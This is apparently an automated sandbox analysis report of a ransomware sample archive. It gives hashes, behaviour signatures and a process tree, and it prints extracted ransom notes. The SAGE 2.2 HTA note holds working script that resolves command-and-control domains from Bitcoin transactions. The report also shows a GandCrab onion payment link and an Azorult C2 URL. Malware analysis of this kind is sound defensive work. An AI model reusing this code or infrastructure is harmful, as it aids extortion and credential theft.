Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    179s
  • max time network
    180s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    09/11/2024, 19:53

General

  • Target

    RNSM00351.7z

  • Size

    9.5MB

  • MD5

    4bb3a829f62c6cdabb5e5b7621291793

  • SHA1

    51535044c807e9b47bfb858e28b607f4fb34b62e

  • SHA256

    2ff8698b92e09af84ae40c9896b024b9404b26c6836e7ae80acb2d20858cf286

  • SHA512

    9dfe58f110e4cfeaf129e2feaa460de6e751c1b28f61905a3c5312754aaa28cdc33bfe9eac621544743cc7e280ad17c157a7125a6f6184a0b663be49a18d6397

  • SSDEEP

    196608:FPJOrUgKAr501BlA1Np/sKMWD9rjWO4UxiE:FPWJ6lATpsj29ryO4Ux

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\!HELP_SOS.hta

Ransom Note
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>Decryption Instructions</title> <HTA:APPLICATION ID='App' APPLICATIONNAME="Decryption Instructions" SCROLL="yes" SINGLEINSTANCE="yes" WINDOWSTATE="maximize"> <style> a { color: #04a; text-decoration: none; } a:hover { text-decoration: underline; } body { background-color: #e7e7e7; color: #222; font-family: "Lucida Sans Unicode", "Lucida Grande", sans-serif; font-size: 12pt; line-height: 16pt; } body, h1 { margin: 0; padding: 0; } h1 { color: #555; text-align: center; padding-bottom: 1.5em; line-height: 1.2; } h2 { color: #555; text-align: center; line-height: 1.2; } ol li { padding-bottom: 13pt; } .container { background-color: #EEE; border: 2pt solid #C7C7C7; margin: 3%; min-width: 600px; padding: 5% 10%; color: #444; } .filecontainer{ padding: 5% 10%; display: none; } .header { border-bottom: 2pt solid #c7c7c7; padding-bottom: 5%; } .hr { background: #bda; display: block; height: 2pt; margin-top: 1.5%; margin-bottom: 1.5%; overflow: hidden; width: 100%; } .key{ background-color: #A1D490; border: 1px solid #506A48; display: block; text-align: center; margin: 0.5em 0; padding: 1em 1.5em; word-wrap: break-word; } .keys{ margin: 3em 0; } .filename{ border: 3px solid #AAA; display: block; text-align: center; margin: 0.5em 0em; padding: 1em 1.5em; background-color: #DCC; } .us{ text-decoration: strong; color: #333; } .info{ background-color: #E4E4E4; padding: 0.5em 3em; margin: 1em 0; } .text{ text-align: justify; } #file{ background-color: #FCC; } .lsb{ display: none; margin: 3%; text-align: center; } .ls{ border: 1px solid #888; border-radius: 3px; padding: 0 0.5em; margin: 0.2em 0.1em; line-height: 2em; display: inline-block; } .ls:hover{ background-color: #D0D0D0; } .l{ display:none; } .lu{ display:none; } </style> <script language="vbscript"> Function GetCmd GetCmd = App.commandLine End Function </script> <script language="javascript"> function openlink(url){ new ActiveXObject("WScript.Shell").Run(url); return false; } function aIndexOf(arr, v){ for(var i = 0; i < arr.length; i++) if(arr[i] == v) return i; return -1; } function tweakClass(cl, f){ var els; if(document.getElementByClassName != null){ els = document.getElementsByClassName(cl); } else{ els = []; var tmp = document.getElementsByTagName('*'); for (var i = 0; i < tmp.length; i++){ var c = tmp[i].className; if( (c == cl) || ((c.indexOf(cl) != 1) && ((' '+c+' ').indexOf(' '+cl+' ') != -1)) ) els.push(tmp[i]); } } for(var i = 0; i < els.length; i++) f(els[i]); } function show(el){ el.style.display = 'block'; } function hide(el){ el.style.display = 'none'; } var langs = ["en","de","it","fr","es","no","pt","nl","kr","ms","zh","tr","vi","hi","jv","fa","ar"]; function setLang(lang){ if(aIndexOf(langs, lang) == -1) lang = langs[0]; for(var i = 0; i < langs.length; i++){ var clang = langs[i]; tweakClass('l-'+clang, function(el){ el.style.display = (clang == lang) ? 'block' : 'none'; }); tweakClass('ls-'+clang, function(el){ el.style.backgroundColor = (clang == lang) ? '#BBB' : ''; }); } } function newXHR() { if (window.XMLHttpRequest) return new window.XMLHttpRequest; try { return new ActiveXObject("MSXML2.XMLHTTP.3.0"); } catch(error) { return null; } } function getPage(url, cb) { try{ var xhr = newXHR(); if(!xhr) return cb('no xhr'); xhr.onreadystatechange = function() { if(xhr.readyState != 4) return; if(xhr.status != 200 || !xhr.responseText) return cb(xhr.status) cb(null, xhr.responseText); }; xhr.open("GET", url+((url.indexOf('?') == -1) ? "?" : "&") + "_=" + new Date().getTime(), true); xhr.send(); } catch(e){ cb(e); } } function decodeTxString(hex){ var m = '0123456789abcdef'; var s = ''; var c = 0xAA; hex = hex.toLowerCase(); for(var i = 0; i < hex.length; i+=2){ var a = m.indexOf(hex.charAt(i)); var b = m.indexOf(hex.charAt(i+1)); if(a == -1 || b == -1) throw hex[i]+hex[i+1]+' '+a+' '+b; s+= String.fromCharCode(c = (c ^ ((a << 4) | b))); } return s; } var OR = 'OP_RE'+'TURN '; var sources = [ {bp:'btc.b'+'lockr.i'+'o/api/v1/', txp:'tx/i'+'nfo/', adp:'add'+'ress/txs/', ptxs: function(json){ if(json.status != 'success') return null; var res = []; for(var i = 0; i < json.data.txs.length - 1; i++) res.push(json.data.txs[i].tx); return res; }, ptx: function(json){ if(json.status != 'success') return null; var os = json.data.vouts; for(var i = 0; i < os.length; i++) if(os[i].extras.asm.indexOf(OR) == 0) return decodeTxString(os[i].extras.asm.substr(10)); return null; } }, {bp:'ch'+'ain.s'+'o/api/v2/', txp:'get_t'+'x_out'+'puts/btc/', adp:'get_tx_uns'+'pent/btc/', ptxs: function(json){ if(json.status != 'success') return null; var res = []; for(var i = json.data.txs.length - 1; i >= 0; i--) res.push(json.data.txs[i].txid); return res; }, ptx: function(json){ if(json.status != 'success') return null; var os = json.data.outputs; for(var i = 0; i < os.length; i++) if(os[i].script.indexOf(OR) == 0) return decodeTxString(os[i].script.substr(10)); return null; } }, {bp:'bit'+'aps.co'+'m/api/', txp:'trans'+'action/', adp:'ad'+'dress/tra'+'nsactions/', adpb:'/0/sen'+'t/all', ptxs: function(json){ var res = []; for(var i = 0; i < json.length; i++) res.push(json[i][1]); return res; }, ptx: function(json){ var os = json.output; for(var i = 0; i < os.length; i++) if(os[i].script.asm.indexOf(OR) == 0) return decodeTxString(os[i].script.asm.substr(10)); return null; } }, {bp:'api.b'+'lockcyp'+'her.com/v1/b'+'tc/main/', txp:'txs/', adp:'addrs/', ptxs: function(json){ var res = []; var m = {}; for(var i = 0; i < json.txrefs.length; i++){ var tx = json.txrefs[i].tx_hash; if(m[tx]) continue; m[tx] = 1; res.push(tx); } return res; }, ptx: function(json){ var os = json.outputs; for(var i = 0; i < os.length; i++) if(os[i].data_hex != null) return decodeTxString(os[i].data_hex); return null; } } ]; function eachUntil(a,f,c){ var i = 0; var n = function(){ if(i >= a.length) return c('f'); f(a[i++], function(err, res){ if(err == null) return c(null, res); n(); }); }; n(); } function getJson(url, cb){ getPage(url, function(err, res){ if(err != null) return cb(err); var json; try{ if(window.JSON && window.JSON.parse){ json = window.JSON.parse(res); } else{ json = eval('('+res+')'); } } catch(e){ cb(e); } cb(null, json); }); } function getDomains(ad, cb){ eachUntil(sources, function(s, cb){ var url = 'http://'+s.bp; url+= s.adp+ad; if(s.adpb) url+= s.adpb; getJson(url, function(err, json){ if(err != null) return cb(err); try{ cb(null, s.ptxs(json)); } catch(e){ cb(e); } }); }, function(err, txs){ if(err != null) return cb(err); if(txs.length == 0) return cb('f'); eachUntil(txs, function(tx, cb){ eachUntil(sources, function(s, cb){ var url = 'http://'+s.bp+s.txp+tx; getJson(url, function(err, json){ if(err != null) return cb(err); try{ cb(null, s.ptx(json)); } catch(e){ cb(e); } }); }, function(err, res){ if(err != null) return cb(err); if(res == null) return cb('f'); cb(null, res.split(':')); }); }, cb); }); } function updateLinks(){ tweakClass('lu', hide); tweakClass('lu-updating', show); getDomains('1783wBG'+'sr'+'1zkxenfE'+'ELXA25PLSkL'+'dfJ4B7', function(err, ds){ tweakClass('lu', hide); if(err != null){ tweakClass('lu-error', show); return; } tweakClass('lu-done', show); var html = ''; for(var i = 0; i < ds.length; i++) html+= '<div class="key"><a href="http://7gie6ffnkrjykggd.'+ds[i]+'/login/AU5ZJKVBfs2PF0RWUpkrVT3Z8o5P5Prvx9YTdJYEG89ZeLa--f55lS3A" onclick="javascript:return openlink(this.href)">http://7gie6ffnkrjykggd.'+ds[i]+'/</a></div>'; tweakClass('links', function(el){ el.innerHTML = html; }); }); return false; } function onPageLoaded(){ try{ tweakClass('lsb', show); }catch(e){} try{ tweakClass('lu-orig', show); }catch(e){} try{ setLang('en'); }catch(e){} try{ var args = GetCmd().match(/"[^"]+"|[^ ]+/g); if(args.length > 1){ var file = args[args.length-1]; if(file.charAt(0) == '"' && file.charAt(file.length-1) == '"') file = file.substr(1, file.length-2); document.getElementById('filename').innerHTML = file; show(document.getElementById('file')); document.title = 'File is encrypted'; } }catch(e){} } </script> </head> <body onload='javascript:onPageLoaded()'> <div class='lsb'> <span class='ls ls-en' onclick="javascript:return setLang('en')">English</span> <span class='ls ls-de' onclick="javascript:return setLang('de')">Deutsch</span> <span class='ls ls-it' onclick="javascript:return setLang('it')">Italiano</span> <span class='ls ls-fr' onclick="javascript:return setLang('fr')">Français</span> <span class='ls ls-es' onclick="javascript:return setLang('es')">Español</span> <span class='ls ls-no' onclick="javascript:return setLang('no')">Norsk</span> <span class='ls ls-pt' onclick="javascript:return setLang('pt')">Português</span> <span class='ls ls-nl' onclick="javascript:return setLang('nl')">Nederlands</span> <br/><span class='ls ls-kr' onclick="javascript:return setLang('kr')">한국어</span> <span class='ls ls-ms' onclick="javascript:return setLang('ms')">Bahasa Melayu</span> <span class='ls ls-zh' onclick="javascript:return setLang('zh')">中文</span> <span class='ls ls-tr' onclick="javascript:return setLang('tr')">Türkçe</span> <span class='ls ls-vi' onclick="javascript:return setLang('vi')">Tiếng Việt</span> <span class='ls ls-hi' onclick="javascript:return setLang('hi')">हिन्दी</span> <span class='ls ls-jv' onclick="javascript:return setLang('jv')">Basa Jawa</span> <span class='ls ls-fa' onclick="javascript:return setLang('fa')">فارسی</span> <span class='ls ls-ar' onclick="javascript:return setLang('ar')">العربية</span> </div> <div id='file' class='container filecontainer'> <div class='filename'> <div style='float:left; padding:18px 0'><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADEAAABACAYAAACz4p94AAAABmJLR0QA/wD/AP+gvaeTAAAACXBIWXMAARCQAAEQkAGJrNK4AAAAB3RJTUUH4QEcFBoaYAOrHQAABThJREFUaN7tmlloXGUUx3/3ziRtTa2xcZ1gtaJFDFjtwSqllaKiiEilKOKDNS2UivXF+qD0QRBRUMQXN/TBBcFifahYFC0urfpghSMqaDSkdQMvojZpIk2zTMaHe776MZ17M6u9ozkwzAwz3/ed/9m+s9yABkhEUFX/+43ATcBy4FxgMdABTAB/Aj8CXwO7VfVdb10AlPy9aqGgTuYDVS3Z56XA48AtdWz1OrBdVQ82AiaoVfJATlWLIrIAeAbYWKciS975LwJ3q+pEJQ03DYRJKVDVGRFZCew0kylnqFaaAULgB+B2Vd1fru3ZKFcDAFS1JCLXA7uBMxs1S29t0fzn5kKhMBBF0WAURYgIURQ1DsIAhKaBVcAbwKk0l0JgGlgIrCkUChpF0U/VAgmrOCBvPrAEeBY4jdZQ3jRyDvCEiJxl2ne+mLowTQs5VZ0yJ95mobMaRx0A3gMGgSPAycCFwHXARQlrfKFeDjwMbG7IsT0zKorIauBtYFGFvxY9s3wZ2Kaqwyn7dgNPpkQ1t9/PwGZV3TNbxErThAOwCOhPADBtexwGNqrqrrR4bxFnBNgkIm8CrwFdCX66BNgA7KlLE2aDeVWdFpHlwPsVfMEBGAXuUtUd1YRGH6CIrLdAESZoYxC4Q1U/r8exQwMQAFdb+CuP7U6LO6oF4MK0d+47ZlpJfJ0HXFsm3OpB2HsPsCZBUtgF9VSZo85KFq7zqnrUTOq3ChYyA3QCq7x1NYFwZnYKsKJCFOqwz59YJKo5VTAmAQ4CuxKiHUCviCyryZzMhIqeOnsSDh8B9qnqTJqU0kKyAT8MfJwiyB5gWa0+ETjGgPOBeQkSGgG+rPdmM99wfjUEHEoA0Q0srRmEaSRv+VFHAogx84lGyO01ChxI+E8XcHq9aUdnhahU8uL471bszJoWVEFHbL8kHhfXCyIE5qesGXX+UW9F5mli0jSbRPMaAdGZ8vtUtSG1ykg1mXIRdzaaxVYjSU7kPmFKaAsq5DW+dBY2WAyV89GV8ntXran4tGfzW4B7K0grAI5WMIF6zAjgD2ATsDXhrPFaGwGZJhE59jrOPMraMIuBK4EzTFqlE8x7YNr6TFUP+dkwQCAiobuhRWQt8DTQl2FlfAtsVdW9DoyviUeA7U1owbSSfL4eU9UHjlVRInI/8FDGATizcvytLhQKQRRFewMRuQJ4y+y/Xcg13IaA/tBCWxftRe5+uwC4NQTWzpabZFgbAFeF1qzKtSEIp40+l+QFtC91hvwHaA7E/xlEKesgZrz6u19VA/eytH64FUGkmSCKtt8XwKWq+opL0GxE8AKwknh6mkkQ03bXRMTT0F9d7m/pfdGy5SHgPtclyRoIZyLfAR95APC6If4A5sOsgfB7UQe88jbJoceI+6+ZdeyOKrWWzxqIwJN+H/F8rlJDzR8XrMiyT1wM3OnX7V797oBeQzxYbF6lJCLTTcpi3fhrBNiiqjsrNCBuIx5Ozs+qT+SJW5vdxHPoS3yHlrjH8nyzAbTCsZ1ZjfPPoMa/DMdpAc0lgHMg2gREqcxPSrSoHdoqx+4Ceu3Sc4x3c/wkNpMgclZT9AIPisjZFl57gUeZZeKThcuuvDhyAppsFfOt9gl/385/w7FLtDmFwF9ebdxO5IQ/HBIPLabaGMT+kLitP9GGAELi4ecHIfAqyc9VZJWc+SvwUi6KorFCofANsA44qQ0AuEfrfgHuUdWB0IqWT4Ebml3At4hywPfAelXd5y47sIfY7XbdQNytuwxYkCHmR4GvgOfcM4fGL38Dzdjo/H/3PFAAAAAASUVORK5CYII=" style='padding:0 7.5px'/></div> <div> <h2 class='l l-en' style='display:block'>The file is encrypted but can be restored</h2><h2 class='l l-de' >Die Datei ist verschlüsselt, aber kann wiederhergestellt werden</h2><h2 class='l l-it' >Il file è crittografato, ma può essere ripristinato</h2><h2 class='l l-fr' >Le fichier est crypté mais peut être restauré</h2><h2 class='l l-es' >El archivo está encriptado pero puede ser restaurado</h2><h2 class='l l-no' >Filen er kryptert men kan bli gjenopprettet</h2><h2 class='l l-pt' >O arquivo está criptografado, mas poderá ser descriptografado</h2><h2 class='l l-nl' >Het bestand is versleuteld maar kan worden hersteld</h2><h2 class='l l-kr' >파일은 암호화되었지만 복원 할 수 있습니다</h2><h2 class='l l-ms' >Fail ini dienkripsikan tetapi boleh dipulih semula.</h2><h2 class='l l-zh' >文件已被加密,但是可以解密</h2><h2 class='l l-tr' >Dosya şifrelenmiş ancak geri yüklenebilir.</h2><h2 class='l l-vi' >Tập tin bị mã hóa nhưng có thể được khôi phục</h2><h2 class='l l-hi' >फाइल एनक्रिप्‍टड हैं लेकिन रिस्‍टोर की जा सकती हैं</h2><h2 class='l l-jv' >File ini dienkripsi tetapi dapat dikembalikan</h2><h2 class='l l-fa' >این فایل رمزگذاری شده است اما می تواند بازیابی شود</h2><h2 class='l l-ar' > الملف مشفر لكن من الممكن إسترجاعه </h2> <p><span id='filename'></span></p> </div> </div> <h2 class='l l-en' style='display:block'>The file you tried to open and other important files on your computer were encrypted by "SAGE 2.2 Ransomware".</h2><h2 class='l l-de' >Die Datei, die Sie öffnen wollten, und andere wichtige Dateien auf ihrem Computer wurden von "SAGE 2.2 Ransomware" verschlüsselt.</h2><h2 class='l l-it' >Il file che hai tentato di aprire e altri file importanti del tuo computer sono stati crittografati da "SAGE 2.2 Ransomware".</h2><h2 class='l l-fr' > Le fichier que vous essayez d’ouvrir et d’autres fichiers importants sur votre ordinateur ont été cryptés par "SAGE 2.2 Ransomware".</h2><h2 class='l l-es' >El archivo que intentó abrir y otros importantes archivos en su computadora fueron encriptados por "SAGE 2.2 Ransomware".</h2><h2 class='l l-no' >Filen du prøvde åpne og andre viktige filer på datamaskinen din ble kryptert av "SAGE 2.2 Ransomware".</h2><h2 class='l l-pt' >O arquivo que você está tentando acessar está criptografado, outros arquivos importantes em seu computador também foram criptografados por "SAGE 2.2 Ransomware".</h2><h2 class='l l-nl' >Het bestand dat je probeert te openen en andere belangrijke bestanden op je computer zijn beveiliged door "SAGE 2.2 Ransomware".</h2><h2 class='l l-kr' >컴퓨터에서 여는 파일 및 기타 중요한 파일은 "SAGE 2.2 Ransomware"에 의해 암호화되었습니다.</h2><h2 class='l l-ms' >Fail yang anda cuba buka dan fail penting yang lain di komputer anda telah dienkripskan oleh "SAGE 2.2 Ransomware".</h2><h2 class='l l-zh' >您试图打开的文件以及您计算机上的其它文件已经用"SAGE 2.2 Ransomware"进行了加密。</h2><h2 class='l l-tr' >Açmaya çalıştığınız dosya ve diğer önemli dosyalarınızı bilgisayarınızda "SAGE 2.2 Ransomware" tarafından şifrelenmiş.</h2><h2 class='l l-vi' >Tập tin mà bạn cố mở và những tập tin quan trọng khác trên máy tính của bạn bị mã hóa bởi "SAGE 2.2 Ransomware".</h2><h2 class='l l-hi' >वो फाइल जिसे आपने खोलने की कोशिश की और आपके कंप्‍यूटर पर बाकी महत्‍वपूर्ण फाइले हमारी ओर से इंक्रिप्टिड की गई हैं "SAGE 2.2 Ransomware"।</h2><h2 class='l l-jv' >File yang Anda coba untuk buka dan file penting lain di komputer Anda yang dienkripsi oleh "SAGE 2.2 Ransomware".</h2><h2 class='l l-fa' >فایلی که ش�
URLs

http://'+s.bp

http://'+s.bp+s.txp+tx

Extracted

Family

azorult

C2

http://uspool.softopia.site/vvv/index.php

Extracted

Path

F:\XK\KWNLVP-DECRYPT.txt

Ransom Note
---= GANDCRAB V5.0.4 =--- ***********************UNDER NO CIRCUMSTANCES DO NOT DELETE THIS FILE, UNTIL ALL YOUR DATA IS RECOVERED*********************** *****FAILING TO DO SO, WILL RESULT IN YOUR SYSTEM CORRUPTION, IF THERE ARE DECRYPTION ERRORS***** Attention! All your files, documents, photos, databases and other important files are encrypted and have the extension: .KWNLVP The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. The server with your key is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- | 0. Download Tor browser - https://www.torproject.org/ | 1. Install Tor browser | 2. Open Tor Browser | 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/2c76df95dab1943c | 4. Follow the instructions on this page ---------------------------------------------------------------------------------------- On our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. ATTENTION! IN ORDER TO PREVENT DATA DAMAGE: * DO NOT MODIFY ENCRYPTED FILES * DO NOT CHANGE DATA BELOW ---BEGIN GANDCRAB KEY--- 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 ---END GANDCRAB KEY--- ---BEGIN PC DATA--- wfKD6iudumBkmpL8IRr4U4exEVaoOXLtwDwmOrT1y1YWvOiWMx5GYaRdvZZCTodRsHYa7ntWs7fcTHSHhh5qBJzzs9MC7736UkGSDDniUJJG8/LFF//kmGmoAZAGLo2j5/wd2UrxMJK+iqKhTkS3ArgAxrZOOOiXrbnhbWMkLHQnbYuWlMClYZxYU6SDxpopRo5r292AV1KIZBZV4APBuUHcKSIr2MWMI0O1MKIP2IpKLE2TS5wLmpQodXZhP6M/UPrO1sZzkDbgjYlAG3g8l65nVd0/CBUxKQ7KDJYrtX0vSmnFXg/ykfgtJNiwqfCnqbr85+Bi4bEhkU/B5uLw/zA2GOsjGo9YPVrRBibtpBHSEdob8icE4oG4b6a1Y8ZyGoyp2Q2iuJRzTRoqGlPQJIAJppFrwNIoDBPOnKw+A+5ZALufjGEwg7NrKg3qxAxKwQ7xZibpCBFE3vbLNeau1wQZLXRgRl+KCjmo1jngAX95mSffmizzQU1nmrIqlsew6HIMVY3pdDfwfAscdcBmP3VNgn9fQ3nC2aZGEvXtdUj8BYRMbJH8Hp4Oar+NRZwP9okRV/rusrPFzM79P3YDh9gzrewdRb9tHf+DbmDW4OIcXpVeLdQr9FxhPlLL2u9gwWmeLQ4zxgtafmr5TWEPiWMEkrI= ---END PC DATA---
URLs

http://gandcrabmfe6mnef.onion/2c76df95dab1943c

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Azorult family
  • Gandcrab

    Gandcrab is a Trojan horse that encrypts files on a computer.

  • Gandcrab family
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Mimikatz family
  • Modifies WinLogon for persistence 2 TTPs 5 IoCs
  • Modifies visibility of file extensions in Explorer 2 TTPs 2 IoCs
  • Modifies visiblity of hidden/system files in Explorer 2 TTPs 2 IoCs
  • Troldesh family
  • Troldesh, Shade, Encoder.858

    Troldesh is a ransomware spread by malspam.

  • UAC bypass 3 TTPs 3 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Renames multiple (397) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Renames multiple (8653) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • mimikatz is an open source tool to dump credentials on Windows 1 IoCs
  • Disables RegEdit via registry modification 3 IoCs
  • Disables Task Manager via registry modification
  • Disables cmd.exe use via registry modification 1 IoCs
  • Disables use of System Restore points 1 TTPs
  • Drops file in Drivers directory 2 IoCs
  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 39 IoCs
  • Loads dropped DLL 54 IoCs
  • Modifies system executable filetype association 2 TTPs 15 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 31 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops desktop.ini file(s) 42 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Installs/modifies Browser Helper Object 2 TTPs 13 IoCs

    BHOs are DLL modules which act as plugins for Internet Explorer.

  • Modifies WinLogon 2 TTPs 1 IoCs
  • AutoIT Executable 15 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 41 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • UPX packed file 24 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 54 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 3 TTPs 3 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Control Panel 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 10 IoCs
  • Modifies Internet Explorer start page 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 4 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 13 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 10 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 60 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 22 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 13 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00351.7z"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:2124
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:2756
  • C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2504
    • C:\Users\Admin\Desktop\00351\HEUR-Trojan-Ransom.MSIL.Blocker.gen-8b4124c4edcec6b198bf7b21c51f4fe74378cd7013eb257b685b5d01004680fa.exe
      HEUR-Trojan-Ransom.MSIL.Blocker.gen-8b4124c4edcec6b198bf7b21c51f4fe74378cd7013eb257b685b5d01004680fa.exe
      2⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Modifies system certificate store
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of AdjustPrivilegeToken
      PID:2528
